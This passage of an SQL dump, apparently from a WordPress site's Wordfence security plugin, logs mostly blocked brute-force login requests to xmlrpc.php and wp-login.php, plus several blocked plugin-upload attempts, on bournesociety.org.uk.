Network',NULL),(12264,0.000000,1631416663.652109,'\0\0\0\0\0\0\0\0\0\0����P�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12265,0.000000,1631417229.948025,'\0\0\0\0\0\0\0\0\0\0��g�t�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12266,0.000000,1631417506.893307,'\0\0\0\0\0\0\0\0\0\0���Y',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12267,0.000000,1631417797.960402,'\0\0\0\0\0\0\0\0\0\0���=�M',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12268,0.000000,1631418085.406908,'\0\0\0\0\0\0\0\0\0\0��.e_A',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12269,0.000000,1631418360.072996,'\0\0\0\0\0\0\0\0\0\0��g/<,',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12270,0.000000,1631418638.734133,'\0\0\0\0\0\0\0\0\0\0����&�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12271,0.000000,1631418907.361556,'\0\0\0\0\0\0\0\0\0\0��h�+�',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12272,1631419177.933829,1631419177.838900,'\0\0\0\0\0\0\0\0\0\0����&�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(12273,0.000000,1631419439.134179,'\0\0\0\0\0\0\0\0\0\0���#�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12274,0.000000,1631419708.845041,'\0\0\0\0\0\0\0\0\0\0���z.�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12275,0.000000,1631419963.424113,'\0\0\0\0\0\0\0\0\0\0��gmш',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12276,0.000000,1631420231.039429,'\0\0\0\0\0\0\0\0\0\0���#y�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12277,0.000000,1631420268.069091,'\0\0\0\0\0\0\0\0\0\0��(r��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12278,0.000000,1631420733.563250,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12279,0.000000,1631421013.577957,'\0\0\0\0\0\0\0\0\0\0��@%4',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12280,0.000000,1631421273.628357,'\0\0\0\0\0\0\0\0\0\0��3O��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12281,0.000000,1631421527.023045,'\0\0\0\0\0\0\0\0\0\0��ms��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12282,0.000000,1631421574.248796,'\0\0\0\0\0\0\0\0\0\0����V',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12283,1631421575.634863,1631421575.543100,'\0\0\0\0\0\0\0\0\0\0����V',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12284,0.000000,1631421781.319007,'\0\0\0\0\0\0\0\0\0\0����7',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12285,0.000000,1631422028.585140,'\0\0\0\0\0\0\0\0\0\0��h�+�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12286,0.000000,1631422116.898811,'\0\0\0\0\0\0\0\0\0\0�����V',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12287,1631422119.652939,1631422119.573300,'\0\0\0\0\0\0\0\0\0\0�����V',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12288,0.000000,1631422263.004073,'\0\0\0\0\0\0\0\0\0\0��/jɆ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12289,0.000000,1631422532.955250,'\0\0\0\0\0\0\0\0\0\0���#��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12290,0.000000,1631422769.401451,'\0\0\0\0\0\0\0\0\0\0���;��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12291,0.000000,1631423052.328462,'\0\0\0\0\0\0\0\0\0\0��]qo\"',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12292,0.000000,1631423302.025378,'\0\0\0\0\0\0\0\0\0\0��g�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12293,0.000000,1631423558.299739,'\0\0\0\0\0\0\0\0\0\0��@�:�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12294,0.000000,1631423817.756985,'\0\0\0\0\0\0\0\0\0\0��[��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12295,0.000000,1631423934.969144,'\0\0\0\0\0\0\0\0\0\0��\"]$d',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12296,0.000000,1631424061.689393,'\0\0\0\0\0\0\0\0\0\0��\"@�f',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12297,0.000000,1631424327.761590,'\0\0\0\0\0\0\0\0\0\0��h��.',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12298,0.000000,1631424612.641416,'\0\0\0\0\0\0\0\0\0\0��]Y��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12299,0.000000,1631424627.977525,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://www.bournesociety.org.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(12300,0.000000,1631424874.690943,'\0\0\0\0\0\0\0\0\0\0��gmш',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12301,0.000000,1631425119.090320,'\0\0\0\0\0\0\0\0\0\0���c�X',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12302,0.000000,1631425402.893049,'\0\0\0\0\0\0\0\0\0\0��=�F�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12303,0.000000,1631425660.683383,'\0\0\0\0\0\0\0\0\0\0��gmш',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12304,0.000000,1631425945.227514,'\0\0\0\0\0\0\0\0\0\0��-v�W',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12305,0.000000,1631426223.482598,'\0\0\0\0\0\0\0\0\0\0��3O��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12306,0.000000,1631426493.446924,'\0\0\0\0\0\0\0\0\0\0��#ÇC',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12307,0.000000,1631426772.581607,'\0\0\0\0\0\0\0\0\0\0��Cޘ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12308,0.000000,1631427052.522943,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12309,0.000000,1631427611.795904,'\0\0\0\0\0\0\0\0\0\0��_�+�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12310,0.000000,1631428027.587161,'\0\0\0\0\0\0\0\0\0\0���Y�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12311,0.000000,1631428298.784015,'\0\0\0\0\0\0\0\0\0\0��h�+�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12312,0.000000,1631428575.602050,'\0\0\0\0\0\0\0\0\0\0��gљ ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12313,0.000000,1631428870.428540,'\0\0\0\0\0\0\0\0\0\0��Cޘ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12314,0.000000,1631429156.467945,'\0\0\0\0\0\0\0\0\0\0��\rL��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12315,0.000000,1631429438.393333,'\0\0\0\0\0\0\0\0\0\0���ŝ',0,200,0,1,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','loginFailValidUsername',NULL,NULL),(12316,0.000000,1631429443.550165,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12317,0.000000,1631429734.445644,'\0\0\0\0\0\0\0\0\0\0��]qo\"',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12318,0.000000,1631430011.435072,'\0\0\0\0\0\0\0\0\0\0��k�i�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12319,0.000000,1631430296.228865,'\0\0\0\0\0\0\0\0\0\0��]qod',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12320,0.000000,1631430584.731040,'\0\0\0\0\0\0\0\0\0\0�����|',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12321,0.000000,1631431171.056832,'\0\0\0\0\0\0\0\0\0\0��P8',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12322,0.000000,1631431239.981664,'\0\0\0\0\0\0\0\0\0\0��^��',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12323,0.000000,1631431330.278579,'\0\0\0\0\0\0\0\0\0\0��\"�d2',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12324,0.000000,1631431471.648003,'\0\0\0\0\0\0\0\0\0\0���O�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12325,0.000000,1631431767.839051,'\0\0\0\0\0\0\0\0\0\0���]c8',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12326,0.000000,1631432050.401928,'\0\0\0\0\0\0\0\0\0\0�����F',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12327,0.000000,1631432636.005083,'\0\0\0\0\0\0\0\0\0\0���,�7',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12328,0.000000,1631432760.040809,'\0\0\0\0\0\0\0\0\0\0��g�z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12329,0.000000,1631432907.742996,'\0\0\0\0\0\0\0\0\0\0��3Q�x',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12330,0.000000,1631433115.076944,'\0\0\0\0\0\0\0\0\0\0���}7�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12331,0.000000,1631433208.727015,'\0\0\0\0\0\0\0\0\0\0��+���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12332,0.000000,1631433348.807501,'\0\0\0\0\0\0\0\0\0\0����6',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12333,0.000000,1631433505.280178,'\0\0\0\0\0\0\0\0\0\0��/��/',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12334,0.000000,1631433760.021093,'\0\0\0\0\0\0\0\0\0\0��4BB',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12335,0.000000,1631433816.579069,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12336,0.000000,1631434110.616994,'\0\0\0\0\0\0\0\0\0\0��3��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12337,0.000000,1631434261.346970,'\0\0\0\0\0\0\0\0\0\0��%�\'~',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12338,0.000000,1631434428.694598,'\0\0\0\0\0\0\0\0\0\0��.e_A',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12339,0.000000,1631434482.598359,'\0\0\0\0\0\0\0\0\0\0��3�+�',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','https://www.google.com/','Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)','loginFailInvalidUsername',NULL,NULL),(12340,0.000000,1631434722.134739,'\0\0\0\0\0\0\0\0\0\0��h�+�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12341,0.000000,1631435028.924074,'\0\0\0\0\0\0\0\0\0\0��Rʬ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12342,0.000000,1631435044.349525,'\0\0\0\0\0\0\0\0\0\0���*',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12343,0.000000,1631435285.307175,'\0\0\0\0\0\0\0\0\0\0���@)�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12344,0.000000,1631435345.469888,'\0\0\0\0\0\0\0\0\0\0��/���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12345,0.000000,1631435646.740149,'\0\0\0\0\0\0\0\0\0\0��P8',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12346,0.000000,1631435769.847302,'\0\0\0\0\0\0\0\0\0\0����h',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12347,0.000000,1631435945.571616,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12348,0.000000,1631436265.703635,'\0\0\0\0\0\0\0\0\0\0��k�X)',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12349,0.000000,1631436557.024049,'\0\0\0\0\0\0\0\0\0\0��g|]�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12350,0.000000,1631436654.868164,'\0\0\0\0\0\0\0\0\0\0��\\�',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12351,0.000000,1631436791.041594,'\0\0\0\0\0\0\0\0\0\0��ge�Q',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12352,0.000000,1631436861.832704,'\0\0\0\0\0\0\0\0\0\0���a�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12353,0.000000,1631436881.902080,'\0\0\0\0\0\0\0\0\0\0���z.�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12354,0.000000,1631437214.567922,'\0\0\0\0\0\0\0\0\0\0��\"}6�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12355,0.000000,1631437237.846052,'\0\0\0\0\0\0\0\0\0\0��hϒ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 